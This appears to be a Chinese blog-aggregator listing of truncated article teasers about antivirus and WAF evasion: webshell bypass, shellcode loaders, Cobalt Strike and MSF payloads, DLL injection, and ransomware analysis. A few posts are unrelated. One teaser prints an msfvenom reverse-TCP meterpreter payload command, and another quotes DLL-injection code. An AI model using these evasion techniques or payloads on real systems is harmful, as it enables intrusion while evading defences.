免杀_特征码

45_webshell绕waf

webshell绕waf两种方式:对webshell所在文件进行扫描静态文件查杀当连接webshell时安全狗会对连接的通讯包进行扫描流量查杀一、webshell编写我们之前在应急响应的时候学过webshll免杀的生成
Beilay()·2023-04-01 13:02

webshell 常见 Bypass waf 技巧总结

在渗透学习的过程中,总会遇到各种情况,例如php大马被waf拦截的时候,那么如何制作免杀phpwebshell呢,接下来就由我带各位小伙伴们一起踏上大马免杀之路,不喜勿喷。
bandongshen9543·2023-04-01 12:18

[网络安全]第三次作业

4.恶意软件的免杀技术有哪些?5.反病毒技术有哪些?6.反病毒网关的工作原理是什么?7.反病毒网关的工作过程是什么?1.什么是APT?2.
君の名280·2023-04-01 01:22

远控免杀从入门到实践 (11) 终结篇

《远控免杀从入门到实践》系列文章目录:1、远控免杀从入门到实践(1)基础篇2、远控免杀从入门到实践(2)工具总结篇3、远控免杀从入门到实践(3)代码篇-C/C++4、远控免杀从入门到实践(4)代码篇-C
扶苏゜·2023-03-31 04:41

Exp3 免杀原理与实践

20155332《网络对抗》Exp3免杀原理与实践1.实验环境联想台式机一台,安装有win10系统,作为靶机进行实测安装的kali虚拟机,作为攻击机kali虚拟机安装有veil-evasion(听说安装过程比较复杂
weixin_33716941·2023-03-31 04:34

《网络攻防》实验三:免杀原理与实践

《网络攻防》实验三:免杀原理与实践世界上公认的第一个在个人电脑上广泛流行的病毒是1986年初诞生的大脑(C-Brain)病毒,编写该病毒的是一对巴基斯坦兄弟,两兄弟经营着一家电脑公司,以出售自己编制的电脑软件为生
weixin_33720956·2023-03-31 04:33

免杀技术

(1)检测特征码人有自己的特征,代码也有自己的特征。杀毒软件都有着一套特征库,依靠检索程序代码是否和库中特征码是否吻合来判断某段代码是否属于病毒。
weixin_30553837·2023-03-31 04:03

20144306《网络对抗》MAL_免杀原理与实践

(1)特征码:类似于人的生物特征,恶意代码可能会包含一段或多端数据能代表其特征。杀软一般会对文件内容进行静态扫描,将文件内容与特征库进行匹配,来检测已知的网络攻击。
weixin_30505485·2023-03-31 04:33

远控免杀专题文章(1)-基础篇

前言一直是从事web安全多一些,对waf绕过还稍微有些研究,但是对远控免杀的认知还大约停留在ASPack、UPX加壳免杀的年代。
Ms08067安全实验室·2023-03-31 04:59

APT之木马静态免杀

前言这篇文章主要是记录手动编写代码进行木马免杀,使用工具也可以免杀,只不过太脚本小子了,而且工具的特征也容易被杀软抓到,指不定哪天就用不了了,所以要学一下手动去免杀木马,也方便以后开发一个只属于自己的木马关于使用工具免杀的教程
Ba1_Ma0·2023-03-31 04:57

免杀前置课——shellcode】二十一、shellcode初步优化——通过跳板指令定位shellcode,解决程序随机基址无法跳转shellcode问题(详解)

shellcode初步优化通过跳板指令定位shellcode极其简化版shellcode_存在问题:```解析(重要)```第一个问题程序随机基址无法确定跳转shellcode位置第二个问题程序未正常退出通过跳板指令定位shellcode极其简化版shellcode_存在问题:1、利用x32dbg_工具查找的栈中shellcode起始地址,用该地址淹没返回地址,这个地址会经常发生变化,须找到一个能
webfker from 0 to 1·2023-03-31 03:15

MSF实战免杀过静态:ShellCode加花指令

分析MSF的ShellCode1.Hash寻找系统API函数由于ShellCode是没有PE结构的,无法通过导入表来调用系统的API函数,因此,这部分是一个通用的API调用函数,它可以根据给定的哈希值查找并调用相应的API。在查找API时,它会遍历已加载模块的列表以及每个模块的导出地址表。这个函数在Shellcode中非常重要,因为它可以让我们不用硬编码API函数地址,而是动态地查找和调用它们。;
Henry404s·2023-03-31 03:22

APT级全面免杀与企业纵深防御体系的红蓝对抗

一、CobaltStrike快速入门CobaltStrike:C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透。CobaltStrike整体功能了解参考MITREATT&CK™CobaltStrike的C/S架构客户端(ClientGUI)团队成员使用的图形化界面服务器(TeamServer)控制-TeamServer是CobaltStrike中所有payloa
wespten·2023-03-29 11:46

【总结】防病毒网关---防毒墙

恶意代码的免杀技术免杀原理文件免杀原理改特征码免杀原理花指令免杀原理加壳免杀原理内存免杀原理行为免杀原理反病毒技术单机反病毒杀毒软件网关反病毒反病毒工作原理首包检
Born to be·2023-03-27 09:52

结合veillCS shellcode免杀(2020.1.13已过期)

dockerrun-it-v/tmp/veil-output:/var/lib/veil/output:Zmattiasohlsson/veil生成的exe文件在/tmp/veil-output,之后在这取三、veil免杀
q1ya·2023-03-26 09:26

MSF--Powershell木马免杀测试过36*和火*

之前看了一篇对CS的Powershell木马进行Base64编码达到免杀效果,今天随便测试了一下MSF的Powershell木马免杀,两者虽然有些不同,但是方法还是大同小异的,Base64编码+修改变量名
LMcream·2023-03-25 16:45

matlab爬虫特征码为两行,而编辑器中一个字符串只能为一行

html_start=['aaa'newline'bbb'];表示将'aaa'和'bbb'用一个换行符连起来。其在变量区中显示为'aaa''bbb',但是你要知道他其实是定义了一个换行符在里面的。
3f31023436c0·2023-03-24 21:56

萧何自污:大智若愚免杀身之祸

背景故事:萧何对刘邦的拥护之恩秦二世元年(公元前209年)七月,陈胜、吴广在大泽乡揭竿而起,举起了反秦的大旗,各地豪杰云集响应,天下大乱。而此时的萧何仍在沛县当功曹,他和曹参、樊哙、夏侯婴、周勃等人时常聚会,密切注视着局势的发展,并暗中与在芒砀山中的刘邦保持着联系。萧何萧何召集沛城父老共商大计。大家都推举刘邦为县令,背秦自立。刘邦却推辞道:“现今天下纷扰,诸侯并起,沛令一席自应选择全县最有声望之人
道不完的你·2023-03-20 23:02

免杀工具shellcodeloader

工具地址:shellcodeloader不想自己编译,就用工具作者自己编译的成品,realseMSF生成bin文件:msfvenom-pwindows/x64/meterpreter_reverse_tcpLHOST=IPLPORT=port-fraw-o1.bin将生成好的木马1.bin拖入shellcodeloader中,并勾选所需配置,配置的选择原项目中介绍的很清楚,这里就不过多赘述了,点击
LMcream·2023-03-17 05:19

突破canvas指纹识别(semiee)

canvas指纹是前端根据浏览器信息和客户端设备各种特征使用特定算法生成可以精准标识浏览器唯一性的特征码.反爬解决思路:批量canvas指纹+批量账号捆绑发送请求1、账号申请2、canvas指纹获取:https
guixuqi·2023-03-13 14:38

CobaltStrike二次开发环境准备以及免杀

文章目录前言一、环境二、过程1.注册Idea2.原版CobaltStrike3.开始反编译4.新建项目5.配置项目6.去除暗桩7.免杀CobaltStrike免杀其他免杀profilefile重写Stager
QQQqQqqqqrrrr·2023-03-12 12:27

NO_ACCESS Protection

NO_ACCESSProtection前言基本思路参考项目:前言这是原本开始是一位朋友研究后发现的一种对抗游戏外挂的思路,我看了一下发现其实可以扩散一下思路用于免杀对抗,说不定有意想不到的效果。
QQQqQqqqqrrrr·2023-03-12 12:27

智能机械(2)

电脑病毒的种类,的确有千千万万,甚至是无穷无尽,想要让一个杀毒软件,包含所有的病毒特征码,哪怕真的可以做到。但计算机病毒,每时每刻都在创新诞生,总有杀毒软件无法识别的!
流年染指浮华·2023-03-11 08:23

加密解密技术基础,创建私有CA

加密类型:单向加密:加密之后可以得到定长的特征码,相同数据特征码相同,主要用户确定数据完整性常见的md5sha1sha256....对称加密:主要用于对数据加密,保证数据的私密性,通常有一个秘钥进行加密解密
精灵祝福·2023-03-11 00:34

Webshell_Generate 工具

且都已做了简单的免杀处理。免杀说明:jsp、jspx:争取将代码最
CSeroad·2023-02-07 04:39

Python免杀CS/MSF木马过36*和火*

今天测试了下Python免杀CS/MSF中Python格式的shellcode主要是巧用HEX编码即可,同之前的Base64编码免杀,不编译成EXE可过Defender。
LMcream·2023-02-03 10:46

msf生成免杀木马

一.杀软原理免杀概念免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写VirusAV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术
夜yesir·2023-02-03 00:53

MSF后门生成及免杀思想

MSF后门生成及免杀思想免杀概念杀毒软件检测方式杀毒软件主动防御免杀技术介绍修改特征码花指令免杀内存免杀加壳免杀二次编译资源修改MSF常用命令常见的木马生成常见后门生成方式编译软件VC++6.0免杀MSF
安澈521·2023-02-03 00:53

WebShell免杀之JSP ——yzddMr6

原文地址:https://yzddmr6.tk/posts/webshell-bypass-jsp/本文已授权悬剑武器库转载前言其他类型的webshell容易免杀的一个主要原因是有eval函数,能够把我们的加密几层后的
yzddMr6·2023-02-03 00:48

使用浏览器扩展篡改网页中的 JS 文件

一、JS文件拦截和篡改经过调试定位到了签名算法所在的地方,然后取前后若干代码作为特征码
·2023-02-02 15:17

FFmpeg抽取视频h264数据

从mp4文件中抽取h264数据步骤如下:1.打开mp4文件并创建一个空文件用于存储H264数据2.提取一路视频流资源3.循环读取流中所有的包(AVPacket),为每个包添加特征码和sps/pps等数据
一叶知秋0830·2023-02-02 12:12

Python OpenCV开发MR智能人脸识别打卡系统(二、文件系统、数据实体模块设计)

文件夹下程序使用的数据文件及文件夹信息如下图所示下面详细介绍每种数据文件的内容格式1:employee_data.txt文件以字符串的形式保存所有员工的数据,数据之间用英文逗号隔开,一行保存一个员工编号1,姓名1,特征码
showswoller·2023-01-27 10:51

MD5加密

//这是个工具包publicclassMd5Util{/***根据给定的文件路径生成该文件的特征码md5**@paramfilePath*@return*/publicstaticStringencodeFile
果冻都烂了·2023-01-27 05:56

技术分享 | go语言源码免杀MSF木马

木马源码免杀两种形式:下载者和加载者https://www.freebuf.com/articles/system/227468.html前言加载者的免杀分为两部分:加载器本身的免杀,加载器源码因为在网上发布许久
天磊卫士官方·2023-01-10 18:21

免杀前置课——Windows编程】十二、线程同步——一文讲懂什么是线程同步、原子操作函数、临界区、互斥体(激发态与非激发态区别)

线程同步线程同步多线程运行同一操作对象问题解决方案A:原子操作函数解决方案B:临界区解决方案C:互斥体激发态与非激发态互斥体优点:线程同步多线程运行同一操作对象问题#include#includeLONGg_count=0;DWORDWINAPImyThreadProc1(_In_LPVOIDlpParameter){for(size_ti=0;i<100000;i++){g_count++;}r
webfker from 0 to 1·2023-01-08 18:51

我的powershell免杀之路

我的powershell免杀之路原创tubai[花指令安全实验室](javascript:void(0)2021-07-0620:39WindowsPowerShell是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用
明月清风~~·2023-01-02 18:48

基于ArcPy的矢量数据变化检测思路与方法

思路分析修改操作类型(数据差异性)包括:新增要素、删除要素、修改要素(图形、属性单独或同时修改)将修改操作的检测,转化为比较数据记录特征码的差异使用MD5存储每条记录(每个要素)特征码信息.每条记录添加一个
suixhcud·2022-12-25 20:48

恶意软件免杀与技术(2022.04.25)

BlackGuard加密货币钱包窃取规避以下dll的加载SbieDll.dll沙盒沙盒SxIn.dll360全方位安全Sf2.dllAvast杀毒软件snxhk.dllAvast杀毒软件cmdvrt32.dllCOMODO网络安全使用Obfuscar进行.NET程序混淆BlackGuard还将查询“IP-Whois”以确定受害者的大致位置。在BlackGuard的一些样本中,此功能用于防止恶意软件
摔不死的笨鸟·2022-12-21 23:33

Conti勒索软件源代码分析

Conti勒索参数静态免杀反调试反HOOK字符串混淆指令混淆线程池加密算法加密性能重启系统安全模式加密参考链接参数Conti勒索软件v3版本的参数调用如下:参数功能-p指定加密路径-mLocalallnetbackups
摔不死的笨鸟·2022-12-21 23:33

内网渗透Windows密码凭证获取

记录一下抓取window凭证信息的一些工具Windows凭证抓取1,procdump(官方工具无视免杀)(首选)procdump+mimikatz加载dmp文件,并导出其中的明文密码(procdump过杀软
西湖第一剑·2022-12-21 08:16

Metasploit实现木马生成、捆绑及免杀

木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。
·2022-12-19 11:57

滴水逆向三期 内存注入/无模块注入

一个为常规的远程线程注入,另一个就是内存注入.只不过文章思路是只插入一段代码,也就是编写shellcode.而无模块注入则是将模块整体以内存写入的形式加载实现隐藏.杀软依然秒杀…但是我封装起来写后就检测不到,特征码竟然消失了
四位·2022-12-19 03:27

软件安全-UPX加壳

从而达到防修改与防反编译的效果,而因为源代码在磁盘中以压缩形式存储,虽然脱壳操作加重了CPU的负担,但减少了磁盘的读写,所以在大多数情况下还能提高程序运行速度;这种技术也常被应用到病毒免杀中,给病毒加壳后
写代码的小阿帆·2022-12-16 02:10

使用浏览器扩展篡改网页中的 JS 文件

一、JS文件拦截和篡改经过调试定位到了签名算法所在的地方,然后取前后若干代码作为特征码
·2022-12-14 21:51

[免杀]基于python的uuid加载器

文章目录uuid字节转换uuid申请内存写入内存创建进程代码uuidUUID:通用唯一标识符(UniversallyUniqueIdentifier),对于所有的UUID它可以保证在空间和时间上的唯一性.它是通过MAC地址,时间戳,命名空间,随机数,伪随机数来保证生成ID的唯一性,有着固定的大小(128bit).它的唯一性和一致性特点使得可以无需注册过程就能够产生一个新的UUID.UUID可以被用
3tefanie丶zhou·2022-12-10 07:03

[免杀]基于python的ipv4加载器

文章目录IPV4将shellcode字节转为Ipv4格式将Ipv4写入内存创建进程IPV4IPv4是一种无连接的协议,操作在使用分组交换的链路层(如以太网)上。此协议会尽最大努力交付数据包,意即它不保证任何数据包均能送达目的地,也不保证所有数据包均按照正确的顺序无重复地到达。IPv4使用32位(4字节)地址,因此地址空间中只有4,294,967,296个地址,格式如下:格式值从点分十进制转换点分十
3tefanie丶zhou·2022-12-10 07:03

网安基础词汇

(sniffer):恶意软件:间谍软件:后门:弱口令:漏洞:远程命令执行漏洞:0day漏洞:1day漏洞:Nday漏洞:攻击方法挂马:挖洞:加壳:溢出:缓冲区溢出:注入:SQL注入:注入点:软件脱壳:免杀
黑弥勒+·2022-12-07 10:05

【网络安全】红队攻防之基础免杀

引言本文主要介绍“反射型dll注入”及“柔性加载”技术。反射型dll注入为什么需要反射型dll注入常规的dll注入代码如下:intmain(intargc,char*argv[]){HANDLEprocessHandle;PVOIDremoteBuffer;wchar_tdllPath[]=TEXT("C:\\experiments\\evilm64.dll");printf("Injecting
kali_Ma·2022-12-06 20:29

Windows下免杀思路总结

1.简介在安全厂商日趋成熟的背景下,编写免杀马的难度和成本日益增长。好用新兴的开源项目在短时间内就被分析并加入特征库。
小黑安全·2022-12-06 02:09

KALI 2020 软件集成清单——数字取证(十一)

11、数字取证11.1取证分割工具集11.1.1magicrescue基于特征码文件恢复工具,该工具直接从磁盘中读取原始数据,搜索特征码
Bressanone6·2022-12-05 17:07
上一页 4 5 6 7 8 9 10 11 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他